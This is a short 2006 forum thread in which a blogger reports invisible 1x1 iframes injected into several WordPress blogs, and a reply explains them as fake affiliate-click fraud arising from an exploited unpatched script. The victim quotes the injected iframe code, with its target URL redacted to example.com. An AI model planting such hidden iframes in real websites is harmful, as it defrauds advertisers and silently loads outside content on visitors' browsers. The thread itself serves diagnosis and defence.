Code inserted into my blog

Forum Moderators: DixonJones

Message Too Old, No Replies

Code inserted into my blog

Have my sites been attacked?

barryfreed

2:50 pm on Feb 27, 2006 (gmt 0)

This morning after posting on one of my WordPress blogs, I noticed in the status bar that I was transmitting data to http://example.com/traff/index.php
Problem is: I have no idea how that got there. I went in and looked at a couple of my blogs, and 5 of 8 of them had the following code:

<iframe width="1" height="1" src="http://example.com/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://example.com/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://example.com/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://example.com/traff/index.php" style="border: 0;"></iframe>

in the header, footer, and body. I have no idea where this came from. Has anyone seen this before? I can't find any info on this through Google.

[edited by: rogerd at 6:14 pm (utc) on Feb. 27, 2006]
[edit reason] Examplified - no specifics or URLs, please [/edit]

Receptional Andy

3:19 pm on Feb 27, 2006 (gmt 0)

Don't know about that particular site, but that is a technique used by pr0n hackers, to get fake affiliate clicks or something similar.

You almost certainly have an unpatched script on your site (e.g. Gallery [gallery.sourceforge.net]) which has been exploited.
You should immediately disable any scripts on your site until you have tracked down the source of this, and fixed the problem - if you have a good hosting company they should be able to help (although be careful if it's a shared host!).